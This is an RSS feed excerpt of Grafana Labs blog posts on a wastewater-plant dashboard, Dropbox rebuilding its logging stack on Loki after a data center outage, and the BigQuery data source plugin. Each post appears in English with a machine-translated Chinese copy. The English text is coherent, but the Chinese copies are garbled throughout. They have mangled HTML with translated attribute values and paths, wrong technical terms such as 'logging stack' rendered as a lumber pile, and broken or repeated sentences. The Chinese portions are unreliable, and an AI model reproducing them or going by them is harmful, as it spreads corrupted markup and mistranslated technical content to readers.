1428”/&gt;&#xA;&lt;NoScript&gt;&#xA;&lt;img&#xA;src =“/媒体/blog/golden-grots-2025-voting/grant-chase-dashboard.png”&#xA;alt =“为莫罗湾（Morro Bay）废水处理厂建造的Grafana仪表板拨款大通（Grafana Dashboard Chase）的屏幕截图。”&#xA;&lt;/noscript&gt; &lt;/div&gt; &lt;/a&gt; &lt;/figie&gt;&#xA;&lt;p&gt;“每列代表一个过程区域，下面是导航按钮，可让您更深入系统。” &lt;/p&gt;&#xA;&lt;p&gt;仪表板可帮助团队可视化数百个传感器，电动机，分析仪和现场升降机站的数据。它可以动态调整数据解决方案，以确保第二准确性，集成了实验室数据以进行合规性监视，甚至包括在盆地中发现的微生物的嵌入式视频提要。&lt;/p&gt;&#xA;&lt;p&gt;“这确实为我们创建了一个完整或更完整的数据模型，”格兰特说。 “我们k现在，该过程是什么，样品的样子以及在给定时间段内观察到的微生物。” &lt;/p&gt;&#xA;&lt;h2 id =“结束思想的钉子和 - 艾哈·摩姆”&gt;闭合思想：大帐篷和&#39;aha&#39;时刻&lt;/h2&gt;&#xA;&lt;p&gt; Grant，Grafana的真正力量不仅在于仪表板，还在于平台开放的社区驱动方法。他说，格拉法纳的“大帐篷”哲学使得解决了这种创造性的问题，这完全导致了他的团队所需要的。&lt;/p&gt;&#xA;&lt;p&gt;“作为开发人员，我一直受到软件的限制，”他说。 “因此，拥有使我继续创新并满足团队需求的软件肯定是最大的&#39;aha&#39;时刻。” &lt;/p&gt;</description>
      <pubDate>Fri, 20 Jun 2025 00:00:00 +0000</pubDate>
    </item>
    <item>
      <title>【How Dropbox rebuilt its logging stack with Grafana Loki after a data center went dark】数据中心变黑后，Dropbox如何与Grafana Loki重建其伐木堆栈</title>
      <link>https://grafana.com/blog/2025/06/27/how-dropbox-rebuilt-its-logging-stack-with-grafana-loki-after-a-data-center-went-dark/</link>
      <description>【&lt;p&gt;Two years ago, a power outage knocked a Dropbox data center offline.&lt;/p&gt;&#xA;&lt;p&gt;It wasn’t just any data center. It was the only one where Dropbox hosted&#xA;&lt;a href=&#34;/oss/loki/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;Grafana Loki&lt;/a&gt;, meaning engineers couldn’t access their log data.&lt;/p&gt;&#xA;&lt;p&gt;“We had considered a data center outage when we were rolling out Loki, but it had just never risen up in priority enough to get put into multiple data centers,” said Chris Hodges, an infrastructure software engineer at the cloud storage company. “And now we were paying the price.”&lt;/p&gt;&#xA;&lt;p&gt;The incident became an inflection point for Dropbox, which evolved that single distributed Loki cluster into a reliable petabyte-scale logging platform—all while balancing developer needs and operational realities. As a result, Dropbox is now able to ingest up to 6 GB of logs per second, with as much as 5 PB in storage at any given time as part of their expanded 30-day retention policy.&lt;/p&gt;&#xA;&lt;p&gt;“It was a good learning experience for us,” said Hodges, who discussed that journey and shared strategies for operationalizing Loki at scale during his&#xA;&lt;a href=&#34;/events/grafanacon/2025/loki-at-dropbox-logging-at-petabyte-scale/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;GrafanaCON 2025 talk&lt;/a&gt; last month. “I wish we&amp;rsquo;d been better prepared for it, but it really gave us an idea of what we needed to do to make this better in the future.”&lt;/p&gt;&#xA;&lt;div&#xA;class=&#34;youtube-lazyload responsive-video&#34;&#xA;data-embed=&#34;XimqMfLBfrI&#34;&#xA;data-url=&#34;https://www.youtube.com/embed/XimqMfLBfrI?autoplay=1&amp;amp;rel=0&#34;&#xA;data-title=&#34;YouTube Video&#34;&#xA;&gt;&#xA;&lt;div class=&#34;play-button&#34;&gt;&lt;/div&gt;&#xA;&lt;/div&gt;&#xA;&lt;h2 id=&#34;a-single-place-for-observability&#34;&gt;‘A single place for observability’&lt;/h2&gt;&#xA;&lt;p&gt;Dropbox originally selected Loki for multi-tenant log aggregation during its migration to Kubernetes. Developers had previously relied on manual, host-by-host logging methods like SSH and VI, or transferring files off hosts. That wasn’t going to scale with Kubernetes, where logs—especially pod logs, which are deleted when pods are rescheduled—are much more ephemeral.&lt;/p&gt;&#xA;&lt;p&gt;Loki is based on object storage, so it offered a more persistent solution. Price, multi-tenancy support, privacy controls, and reliability were additional selling points, as was Dropbox’s longtime use of Grafana Labs&amp;rsquo; projects and products in other areas.&lt;/p&gt;&#xA;&lt;p&gt;“We definitely wanted to have a single place for observability: logs, metrics, and traces,” Hodges said. “And Grafana just seemed like it was going to continue to be the best solution for that.”&lt;/p&gt;&#xA;&lt;h2 id=&#34;planning-and-design&#34;&gt;Planning and design &lt;/h2&gt;&#xA;&lt;p&gt;The outage made it clear that Loki needed to be in multiple regions to ensure its availability, even in the event of a complete data center failure. Dropbox developed a failover strategy where DNS would redirect the log shipping agent Promtail to Loki, so logs to be sent to a different region in case of disaster.&lt;/p&gt;&#xA;&lt;p&gt;The system also used a shared object storage layer across regions, with Amazon S3 offering availability zone redundancy and Dropbox’s&#xA;&lt;a href=&#34;https://www.infoq.com/articles/dropbox-magic-pocket-exabyte-storage/&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;Magic Pocket&lt;/a&gt; providing on-premises, cross-region storage replication. This combination eliminated the need for duplicate logs, which would have been cost-prohibitive at petabyte scale.&lt;/p&gt;&#xA;&lt;p&gt;Dropbox designed a playbook for simulating this failover without disrupting users. During these tests, Hodges and team discovered that logs buffered in memory didn’t immediately flush to storage, creating the potential for data loss. Engineers manually triggered a flush, but that caused a disruptive torrent of writes. The experience reinforced the importance of cross-team coordination, rate-limiting safeguards. and testing before deployment.&lt;/p&gt;&#xA;&lt;p&gt;“I&amp;rsquo;d rather the first time we run this not be when a data center is down,” Hodges said.&lt;/p&gt;&#xA;&lt;h2 id=&#34;a-gradual-rollout&#34;&gt;A gradual rollout&lt;/h2&gt;&#xA;&lt;p&gt;From there, Dropbox took a measured approach to deploying Loki more widely. Promtail gradually rolled out to 10,000 to 20,000 hosts at a time as the team watched for ingestion and disk usage spikes.&lt;/p&gt;&#xA;&lt;p&gt;One problem that emerged was high cardinality. Each log line included a set of labels, such as the service name and host, that formed a unique identifier. But too many label combinations on a host threatened to clog the ingestion pipeline and cause out-of-memory crashes. Dropbox addressed this issue by imposing tight controls and standardization on its label schema.&lt;/p&gt;&#xA;&lt;p&gt;Strict limits—including seven-day retention, six-hour query windows and both global and per-stream rate caps—further helped maintain stability as adoption increased. Still, some services generated so many logs that they risked overwhelming the system. Dropbox isolated these workloads using stream-level controls and exponential backoff in Promtail. Additionally, custom pull requests allowed one service to be heavily throttled while others could continue sending logs, which solved the problem of head-of-line blocking.&lt;/p&gt;&#xA;&lt;p&gt;“A core tenet of multi-tenancy is that one badly behaving tenant doesn’t ruin the experience for everybody,” Hodges said. “This was an issue that very nearly kept us from rolling out Loki to production.”&lt;/p&gt;&#xA;&lt;h2 id=&#34;a-trusted-system&#34;&gt;A trusted system&lt;/h2&gt;&#xA;&lt;p&gt;As the system proved itself, Dropbox relaxed some restrictions, such as by increasing retention to 30 days. The company also worked with Grafana Labs to switch its back end from BoltDB to a Prometheus-style time series database.&lt;/p&gt;&#xA;&lt;p&gt;“They saved our bacon,” Hodges said. “We saw an order of magnitude improvement in our performance on label queries.”&lt;/p&gt;&#xA;&lt;figure&#xA;class=&#34;figure-wrapper figure-wrapper__lightbox w-100p &#34;&#xA;style=&#34;max-width: 2498px;&#34;&#xA;itemprop=&#34;associatedMedia&#34;&#xA;itemscope=&#34;&#34;&#xA;itemtype=&#34;http://schema.org/ImageObject&#34;&#xA;&gt;&lt;a&#xA;class=&#34;lightbox-link&#34;&#xA;href=&#34;/media/blog/dropbox-loki/loki-adoption-over-time.png&#34;&#xA;itemprop=&#34;contentUrl&#34;&#xA;&gt;&lt;div class=&#34;img-wrapper w-100p h-auto&#34;&gt;&lt;img&#xA;class=&#34;lazyload &#34;&#xA;data-src=&#34;/media/blog/dropbox-loki/loki-adoption-over-time.png&#34;data-srcset=&#34;/media/blog/dropbox-loki/loki-adoption-over-time.png?w=320 320w, /media/blog/dropbox-loki/loki-adoption-over-time.png?w=550 550w, /media/blog/dropbox-loki/loki-adoption-over-time.png?w=750 750w, /media/blog/dropbox-loki/loki-adoption-over-time.png?w=900 900w, /media/blog/dropbox-loki/loki-adoption-over-time.png?w=1040 1040w, /media/blog/dropbox-loki/loki-adoption-over-time.png?w=1240 1240w, /media/blog/dropbox-loki/loki-adoption-over-time.png?w=1920 1920w&#34;&#xA;data-sizes=&#34;auto&#34;alt=&#34;A Grafana dashboard shows how Dropbox has grown its log igestion rate over time&#34;width=&#34;2498&#34;height=&#34;1408&#34;/&gt;&#xA;&lt;noscript&gt;&#xA;&lt;img&#xA;src=&#34;/media/blog/dropbox-loki/loki-adoption-over-time.png&#34;&#xA;alt=&#34;A Grafana dashboard shows how Dropbox has grown its log igestion rate over time&#34;width=&#34;2498&#34;height=&#34;1408&#34;/&gt;&#xA;&lt;/noscript&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&#xA;&lt;p&gt;Today, Loki has become a trusted system across the entire company—so much so that Dropbox shut down its legacy logging system. Its shared storage and DNS-based region switching enable fast failover for high availability. And it operates at a massive scale as a core part of Dropbox’s observability stack. It now ingests 5 GB to 6 GB of logs per second, with 30-day retention totaling 4 PB to 5 PB at any given time.&lt;/p&gt;&#xA;&lt;p&gt;That steady growth—from a single-region cluster to a resilient platform—is one of the main reasons why &amp;ldquo;we&amp;rsquo;re excited for what&amp;rsquo;s coming forward with Loki,&amp;rdquo; Hodges said.&lt;/p&gt;&#xA;&lt;p&gt;&lt;em&gt;&#xA;&lt;a href=&#34;/products/cloud/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;Grafana Cloud&lt;/a&gt; is the easiest way to get started with metrics, logs, traces, dashboards, and more. We have a generous forever-free tier and plans for every use case.&#xA;&lt;a href=&#34;/auth/sign-up/create-user/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt; Sign up for free now&lt;/a&gt;!&lt;/em&gt;&lt;/p&gt;】&lt;p&gt;两年前，一次停电使Dropbox Data Center Offline敲开了Dropbox数据中心。&lt;/p&gt;&#xA;&lt;p&gt;不仅是任何数据中心。这是唯一一个托管的人&#xA;&lt;a href =“/oss/loki/？pg = blog＆plcmt = body-txt”&gt; grafana loki &lt;/a&gt;，这意味着工程师无法访问其日志数据。&lt;/p&gt;&#xA;&lt;p&gt;“当我们推出Loki时，我们已经考虑了数据中心的中断，但它从未优先提高以至于将其放入多个数据中心。 “现在我们要付出代价。” &lt;/p&gt;&#xA;&lt;p&gt;该事件成为Dropbox的一个拐点，该凸箱将单个分布式的Loki群集演变为可靠的PB尺度记录平台，所有这些都在平衡开发人员的需求和操作现实的同时。结果，Dropbox现在能够每秒摄入多达6 GB的日志，在任何给定时间存储多达5 pb，作为其扩展的30天保留政策的一部分。&lt;/p&gt;&#xA;&lt;p&gt;“这对我们来说是一次很好的学习经历，”霍奇斯说，他讨论了这一旅程和分享的策略，以便在他的过程中大规模运营Loki&#xA;&lt;a href =“/events/grafanacon/2025/loki-at-at-dropbox-logging-at-at-at-petabyte-cale/？pg = blog＆plcmt = body-txt = body-txt”&gt; grafanacon 2025 2025 Talk &lt;/a&gt;上个月。 “我希望我们能为此做好准备，但这确实使我们了解了将来需要做些什么才能使情况变得更好。” &lt;/p&gt;&#xA;&lt;div&#xA;class =“ youtube-lazyload响应式video”&#xA;data-embed =“ ximqmflbfri”&#xA;data-url =“ https://www.youtube.com/embed/ximqmflbfri?autoplay=1&amp;rel=0”&#xA;数据标题=“ YouTube视频”&#xA;&gt;&#xA;&lt;div class =“ play-button”&gt; &lt;/div&gt;&#xA;&lt;/div&gt;&#xA;在&#xA;&lt;p&gt; Dropbox最初选择的LOKI用于多租户日志聚合，以便在其迁移到Kubernetes期间。开发人员以前曾依靠手册，宿主记录方法（如SSH和VI），或者从主机上转移文件。这不会随着Kubernetes的规模扩展，该日志（尤其是在重新安排豆荚时被删除的吊舱日志），这是更短暂的。&lt;/p&gt;&#xA;&lt;p&gt; loki基于对象存储，因此它提供了更持久的解决方案。价格，多租户支持，隐私控制和可靠性是其他卖点，Dropbox长期使用Grafana Labs的项目和其他领域的产品。&lt;/p&gt;&#xA;&lt;p&gt;“我们绝对想拥有一个可观察性的地方：日志，指标和痕迹，”霍奇斯说。 “而且格拉法纳似乎将继续成为最好的解决方案。” &lt;/p&gt;&#xA;&lt;H2 ID =“计划和设计”&gt;计划和设计&lt;/h2&gt;&#xA;&lt;p&gt;中断明确表明，即使在完全数据中心故障的情况下，Loki也需要在多个区域内确保其可用性。 Dropbox制定了一种故障转移策略，DNS将将日志运输代理的Promtail重定向到Loki，因此在发生灾难的情况下，日志被发送到其他地区。&lt;/p&gt;&#xA;&lt;p&gt;系统还使用了共享对象跨区域的存储层，Amazon S3提供可用性区域冗余和Dropbox&#xA;&lt;a href =“ https://www.infoq.com/articles/dropbox-magic-pocket-exabyte-storage/” target =“ _ black” rel =“ noopener noreferrer”&gt;魔术口袋&lt;/a&gt;提供本地跨区域存储复制。这种组合消除了对重复日志的需求，这在PB尺度上会过于良好。&lt;/p&gt; &lt;/p&gt;&#xA;&lt;p&gt; Dropbox设计了一本剧本，用于模拟此故障转移而不会破坏用户。在这些测试中，霍奇斯和团队发现，在内存中缓冲的日志并没有立即冲洗到存储，从而产生了数据丢失的可能性。工程师手动触发了冲洗，但这引起了颠覆性的写作。这种经验加强了跨阵容协调，限制速率保障措施的重要性。和部署前的测试。&lt;/p&gt;&#xA;&lt;p&gt;“我宁愿我们第一次运行的不是数据中心掉落的时候。” &lt;/p&gt;&#xA;&lt;h2 id =“ a gradual-rollout”&gt;逐渐推出&lt;/h2&gt;&#xA;&lt;p&gt;从那里，Dropbox采用了一种测量的方法来更广泛地部署Loki。当团队观看摄入和磁盘用法尖峰时&#xA;&lt;p&gt;出现的一个问题是高铁。每个日志行都包含一组构成唯一标识符的标签，例如服务名称和主机。但是，寄主的标签组合太多，可能会堵塞摄入管道并导致过度的撞车事故。 Dropbox通过在其标签架构上实施严格的控制和标准化来解决此问题。&lt;/p&gt;&#xA;&lt;p&gt;严格的限制 - 包括7天的保留，六小时的查询窗口以及全球和每次流率上限 - 随着采用率的增加而有助于保持稳定性。尽管如此，某些服务仍产生了如此多的日志，以至于他们冒着压倒系统的风险。 Dropbox使用流级控件和Promtail中的指数向后隔离了这些工作负载。此外，自定义拉的请求允许一项服务大量节流，而其他服务可以继续发送日志，这解决了线条阻止的问题。&lt;/p&gt;&#xA;&lt;p&gt;“多租户的核心宗旨是，一个表现不佳的房客不会破坏所有人的经验，”霍奇斯说。 “这是一个几乎使我们无法将Loki推出到生产的问题。” &lt;/p&gt;&#xA;&lt;H2 ID =“ A-Trusted-System”&gt;一个受信任的系统&lt;/h2&gt;&#xA;&lt;p&gt;正如系统证明自己的那样，Dropbox放宽了一些限制，例如将保留率提高到30天。该公司还与Grafana Labs合作，将其后端从Boltdb切换为Prometheus风格的时间序列数据库。&lt;/p&gt;&#xA;&lt;p&gt;“他们拯救了我们的培根，”霍奇斯说。 “我们在标签查询上的性能有所改善。” &lt;/p&gt;&#xA;&lt;图&#xA;class =“ figup-wrapper figuper-wrapper__lightbox W-100P”&#xA;样式=“最大宽度：2498px;”&#xA;itemprop =“ iSsectedmedia”&#xA;itemScope =“”&#xA;itemType =“ http://schema.org/imageObject”&#xA;&gt; &lt;a&#xA;class =“ Lightbox-link”&#xA;href =“/媒体/blog/dropbox-loki/loki-adoption-over time.png”&#xA;itemprop =“ contenturl”&#xA;&gt; &lt;div class =“ img-wrapper W-100P H-auto”&gt; &lt;img&#xA;class =“ Lazyload”&#xA;data-src =“/媒体/blog/dropbox-loki/loki-adoption-over time.png” data-srcset =“/媒体/blog/drogbox loki/loki-adoption-option-overtie.png？ /media/blog/dropbox-loki/loki-adoption-over time.png?w=750 750w，/media/blog/dropbox-loki/loki-adoption-odoption-option-over-pime.png?w=900 900w，/mredia/media/media/blog/dropbox-loki/loki/loki/loki/loki/loki/loki-adoption-perim.pn-0400404040404040404040404040404040404040404 /Media/blog/dropbox-loki/loki-adoption-over time.png?w=1240 1240W，/media/blog/dropbox-loki/loki-adoption-option-over-pite.png?w=19201920w&#39;&#xA;data-sizes =“ auto” alt =“一个grafana仪表板显示了dropbox如何随时间增长其日志igestion率。&#xA;&lt;NoScript&gt;&#xA;&lt;img&#xA;src =“/媒体/blog/dropbox-loki/loki-adoption-over time.png”&#xA;alt =“ grafana仪表板显示了Dropbox如何随时间增长其日志igestion率。宽度=“ 2498”高=“ 1408”&#xA;&lt;/noscript&gt; &lt;/div&gt; &lt;/a&gt; &lt;/figie&gt;&#xA;&lt;p&gt;今天，Loki已成为整个公司的一个值得信赖的系统 - 因此，Dropbox关闭了其传统记录系统。它的共享存储和基于DNS的区域切换可实现快速故障转移，以获得高可用性。它是Dropbox可观察性堆栈的核心部分的大规模运行。现在，它可以每秒摄入5 GB至6 GB的日志，在任何给定时间，保留总计为4 pb至5 pb。&lt;/p&gt; &lt;/p&gt;&#xA;&lt;p&gt;稳定的增长（从单一区域集群到弹性平台）是“我们为Loki的进展感到兴奋的主要原因之一，”霍奇斯说。&lt;/p&gt;。&lt;/p&gt;&#xA;&lt;p&gt; &lt;em&gt;&#xA;&lt;a href =“/products/cloud/？pg = blog＆plcmt = body-txt”&gt; grafana cloud &lt;/a&gt;是从指标，日志，痕迹，痕迹，仪表板等开始的最简单方法。我们有一个宽敞的永远的层次，并为每个用例都有计划。&#xA;&lt;a href =“//auth/ign-up/create-user/？pg = blog＆plcmt = body-txt”&gt;现在免费注册&lt;/a&gt;！&lt;/em&gt; &lt;/em&gt; &lt;/p&gt;</description>
      <pubDate>Fri, 27 Jun 2025 00:00:00 +0000</pubDate>
    </item>
    <item>
      <title>【Visualize Google Cloud BigQuery data in Grafana: the latest updates, key features, and more】可视化Grafana中的Google Cloud BigQuery数据：最新更新，关键功能等等</title>
      <link>https://grafana.com/blog/2025/06/18/visualize-google-cloud-bigquery-data-in-grafana-the-latest-updates-key-features-and-more/</link>
      <description>【&lt;p&gt;Here at Grafana Labs, our commitment to our “big tent” philosophy runs deep. We prioritize interoperability and flexibility within our observability solutions, and believe you should be able to connect to and visualize data from a wide range of sources, including both open source and commercial technologies.&lt;/p&gt;&#xA;&lt;p&gt;Our rich ecosystem of&#xA;&lt;a href=&#34;/docs/grafana/latest/datasources/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;Grafana data sources&lt;/a&gt; directly reflects these values — and today, we’re excited to share a recent milestone related to that ecosystem.&lt;/p&gt;&#xA;&lt;p&gt;Grafana Labs has successfully achieved the Google Cloud Ready – BigQuery designation for our&#xA;&lt;a href=&#34;/grafana/plugins/grafana-bigquery-datasource/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;Google Cloud BigQuery data source for Grafana&lt;/a&gt;. &lt;/p&gt;&#xA;&lt;p&gt;&#xA;&lt;a href=&#34;https://cloud.google.com/bigquery/docs/bigquery-ready-overview&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;Google Cloud Ready - BigQuery&lt;/a&gt; is a partner integration validation program that intends to increase customer confidence in partner integrations with&#xA;&lt;a href=&#34;https://cloud.google.com/bigquery&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;BigQuery&lt;/a&gt;. &lt;/p&gt;&#xA;&lt;p&gt;By earning this designation, we’ve proven that our data source has met a core set of functional and interoperability requirements when integrating Grafana with BigQuery. Being part of the program also means we’ll get more opportunities to collaborate closely with Google Cloud partner engineering and BigQuery teams to develop roadmaps.&lt;/p&gt;&#xA;&lt;p&gt;In this post, we’ll provide a brief overview of our Google Cloud BigQuery data source for Grafana, highlight key features, and offer some helpful resources to get started.&lt;/p&gt;&#xA;&lt;div&#xA;class=&#34;youtube-lazyload responsive-video&#34;&#xA;data-embed=&#34;osY3J1U2n-M&#34;&#xA;data-url=&#34;https://www.youtube.com/embed/osY3J1U2n-M?autoplay=1&amp;amp;rel=0&#34;&#xA;data-title=&#34;YouTube Video&#34;&#xA;&gt;&#xA;&lt;div class=&#34;play-button&#34;&gt;&lt;/div&gt;&#xA;&lt;/div&gt;&#xA;&lt;h2 id=&#34;the-google-cloud-bigquery-data-source-for-grafana-overview-and-key-features&#34;&gt;The Google Cloud BigQuery data source for Grafana: overview and key features &lt;/h2&gt;&#xA;&lt;p&gt;Our Google Cloud BigQuery data source allows you to query and visualize data from Google Cloud BigQuery — a fully managed, serverless, and AI-ready data platform hosted on Google Cloud — within Grafana.&lt;/p&gt;&#xA;&lt;p&gt;Key features of the Google Cloud BigQuery data source for Grafana include:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;&lt;strong&gt;Query and visualization&lt;/strong&gt;: Visualize Google Cloud BigQuery data directly within Grafana dashboards, supporting both time series and table visualizations. You can use&#xA;&lt;a href=&#34;/docs/plugins/yesoreyeram-infinity-datasource/latest/query/macros/&#34;&gt;macros&lt;/a&gt; to simplify syntax and make queries dynamic, such as filtering by time ranges.&lt;/li&gt;&#xA;&lt;li&gt;&lt;strong&gt;Flexible authentication&lt;/strong&gt;: The data source supports authentication via&#xA;&lt;a href=&#34;https://cloud.google.com/iam/docs/service-account-creds&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;Google Service Account keys (JWT)&lt;/a&gt;,&#xA;&lt;a href=&#34;https://cloud.google.com/compute/docs/metadata/overview&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;VM metadata server&lt;/a&gt; (when running on Google Cloud Compute Engine), and&#xA;&lt;a href=&#34;https://cloud.google.com/iam/docs/workload-identity-federation&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;Workload Identity Federation &lt;/a&gt;(when running on Google Kubernetes Engine), making it adaptable to different deployment scenarios. &lt;/li&gt;&#xA;&lt;li&gt;&lt;strong&gt;SQL query editor&lt;/strong&gt;: Use a powerful SQL editor with rich autocompletion for BigQuery standard SQL, datasets, tables, columns, macros, and template variables. &lt;/li&gt;&#xA;&lt;li&gt;&lt;strong&gt;Visual query editor&lt;/strong&gt;: Don’t want to write SQL? No worries. The data source also includes a visual query editor with support for basic aggregations, filtering, grouping, ordering, and raw query previews.&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;In addition, the plugin integrates with the&#xA;&lt;a href=&#34;https://cloud.google.com/resource-manager/reference/rest&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;Google Cloud Resource Manager API&lt;/a&gt;, allowing you to access multiple Google Cloud projects from a single data source in Grafana. These and other features provide a robust solution for integrating BigQuery data into your Grafana observability workflows.&lt;/p&gt;&#xA;&lt;figure&#xA;class=&#34;figure-wrapper figure-wrapper__lightbox w-100p &#34;&#xA;style=&#34;max-width: 1999px;&#34;&#xA;itemprop=&#34;associatedMedia&#34;&#xA;itemscope=&#34;&#34;&#xA;itemtype=&#34;http://schema.org/ImageObject&#34;&#xA;&gt;&lt;a&#xA;class=&#34;lightbox-link&#34;&#xA;href=&#34;/media/blog/bigquery-plugin-updates/bigquery-dashboard.png&#34;&#xA;itemprop=&#34;contentUrl&#34;&#xA;&gt;&lt;div class=&#34;img-wrapper w-100p h-auto&#34;&gt;&lt;img&#xA;class=&#34;lazyload &#34;&#xA;data-src=&#34;/media/blog/bigquery-plugin-updates/bigquery-dashboard.png&#34;data-srcset=&#34;/media/blog/bigquery-plugin-updates/bigquery-dashboard.png?w=320 320w, /media/blog/bigquery-plugin-updates/bigquery-dashboard.png?w=550 550w, /media/blog/bigquery-plugin-updates/bigquery-dashboard.png?w=750 750w, /media/blog/bigquery-plugin-updates/bigquery-dashboard.png?w=900 900w, /media/blog/bigquery-plugin-updates/bigquery-dashboard.png?w=1040 1040w, /media/blog/bigquery-plugin-updates/bigquery-dashboard.png?w=1240 1240w, /media/blog/bigquery-plugin-updates/bigquery-dashboard.png?w=1920 1920w&#34;&#xA;data-sizes=&#34;auto&#34;alt=&#34;A screenshot of a Grafana dashboard using the BigQuery data source plugin.&#34;width=&#34;1999&#34;height=&#34;1027&#34;/&gt;&#xA;&lt;noscript&gt;&#xA;&lt;img&#xA;src=&#34;/media/blog/bigquery-plugin-updates/bigquery-dashboard.png&#34;&#xA;alt=&#34;A screenshot of a Grafana dashboard using the BigQuery data source plugin.&#34;width=&#34;1999&#34;height=&#34;1027&#34;/&gt;&#xA;&lt;/noscript&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&#xA;&lt;h2 id=&#34;learn-more-and-next-steps&#34;&gt;Learn more and next steps&lt;/h2&gt;&#xA;&lt;p&gt;To learn more about the Google Cloud BigQuery data source for Grafana, including how to install, configure, and provision the data source, please visit our&#xA;&lt;a href=&#34;/grafana/plugins/grafana-bigquery-datasource/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;plugin catalog page&lt;/a&gt;. &lt;/p&gt;&#xA;&lt;p&gt;You can also learn more about our broad ecosystem of data source plugins for Grafana in&#xA;&lt;a href=&#34;/blog/2025/02/25/data-sources-visualizations-and-apps-a-guide-to-extending-and-customizing-grafana/&#34;&gt;this blog post&lt;/a&gt; and by watching this&#xA;&lt;a href=&#34;/go/webinar/unify-your-data-with-grafana-plugins-datadog-splunk-mongodb/&#34;&gt;webinar&lt;/a&gt;. &lt;/p&gt;&#xA;&lt;p&gt;&lt;em&gt;&#xA;&lt;a href=&#34;/products/cloud/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;Grafana Cloud &lt;/a&gt;is the easiest way to get started with metrics, logs, traces, dashboards, and more. We have a generous forever-free tier and plans for every use case.&#xA;&lt;a href=&#34;/auth/sign-up/create-user/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;Sign up for free now!&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;】&lt;p&gt;在Grafana Labs，我们对“大帐篷”哲学的承诺非常深入。我们在可观察性解决方案中优先考虑互操作性和灵活性，并相信您应该能够连接并可视化广泛来源的数据，包括开源技术和商业技术。&lt;/p&gt;&#xA;&lt;p&gt;我们丰富的生态系统&#xA;&lt;a href =“/docs/grafana/最终/数据源/？&#xA;&lt;p&gt; Grafana Labs已成功实现了Google Cloud准备工作 - 我们&#xA;&lt;a href =“/grafana/plugins/grafana-bigquery-datasource/？pg = blog＆plcmt = body-txt”&gt; google cloud cloud bigquery数据源&lt;/a&gt;。 &lt;/p&gt;&#xA;&lt;p&gt;&#xA;&lt;a href =“ https://cloud.google.com/bigquery/docs/bigquery-ready-overview” target =“ _ black” rel =“ noopener noreferrer”&gt; google cloud ready-bigquery-bigquery-bigquery-bigquery &lt;/a&gt;是一项能够提高伙伴集成验证计划，以提高伙伴集成与伙伴集成的信心&#xA;&lt;a href =“ https://cloud.google.com/bigquery” target =“ _ blank” rel =“ noopener noreferrer”&gt; bigquery &lt;/a&gt;。 &lt;/p&gt;&#xA;&lt;p&gt;通过获得此名称，我们证明，当将Grafana与BigQuery集成时，我们的数据源已经满足了一组功能和互操作性要求。成为该计划的一部分也意味着我们将获得更多机会与Google Cloud Cloud合作伙伴工程和BigQuery团队紧密合作，以开发路线图。&lt;/p&gt;&#xA;&lt;p&gt;在这篇文章中，我们将简要概述Google Cloud BigQuery数据源，突出显示关键功能，并提供一些有用的资源来开始。&lt;/p&gt;&#xA;&lt;div&#xA;class =“ youtube-lazyload响应式video”&#xA;data-embed =“ OSY3J1U2N-M”&#xA;data-url =“ https://www.youtube.com/embed/osy3j1u2n-m?autoplay = 1&amp;rel=0”&#xA;数据标题=“ YouTube视频”&#xA;&gt;&#xA;&lt;div class =“ play-button”&gt; &lt;/div&gt;&#xA;&lt;/div&gt;&#xA;&lt;h2 id =“ the-google-cloud-bigquery-data-source-source-for-grafana-overview and-key-features”&gt; google cloud cloud bigquery数据源：概述和关键功能&lt;/h2&gt;&#xA;&lt;p&gt;我们的Google Cloud BigQuery数据源允许您在Grafana中查询和可视化Google Cloud BigQuery的数据 - 一个完全管理，无服务器和AI-Ready数据平台。&lt;/p&gt;&#xA;&lt;p&gt; GROGE Cloud BigQuery数据源的关键功能包括：&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt; &lt;strong&gt;查询和可视化&lt;/strong&gt;：直接在Grafana仪表板中可视化Google Cloud BigQuery数据，支持时间序列和表可视化。您可以使用&#xA;&lt;a href =“/docs/plugins/yesReyeryeram-infinity-datasource/最终/query/macros/”&gt;宏&lt;/a&gt; &lt;/a&gt;简化语法并使查询动态，例如按时间范围进行过滤。&lt;/li&gt;&#xA;&lt;li&gt; &lt;strong&gt;灵活身份验证&lt;/strong&gt;：数据源支持通过&#xA;&lt;a href =“ https://cloud.google.com/iam/docs/service-account-creds” target =“ _ blank” rel =“ noopener noreferrer”&gt; Google Service Service帐户键（JWT）&lt;/a&gt;&#xA;&lt;a href =“ https：//cloud.google.com/compute/docs/metadata/metadata/overview“ target =” _ blank“ rel =” noopener noreferrer“&gt; vm元数据&gt;&#xA;&lt;a href =“ https://cloud.google.com/iam/docs/workload-isentity-federation” target =“ _ black” rel =“ noopener noreferrer”&gt; Workload Identity Identity Federation &lt;/a&gt;（在Google Kubernetes引擎上运行时），使其可适应不同的部署场景。 &lt;/li&gt;&#xA;&lt;li&gt; &lt;strong&gt; SQL查询编辑器&lt;/strong&gt;：使用具有丰富自动完成的功能强大的SQL编辑器，用于BigQuery Standard SQL，数据集，表，列，列，宏和模板变量。 &lt;/li&gt;&#xA;&lt;li&gt; 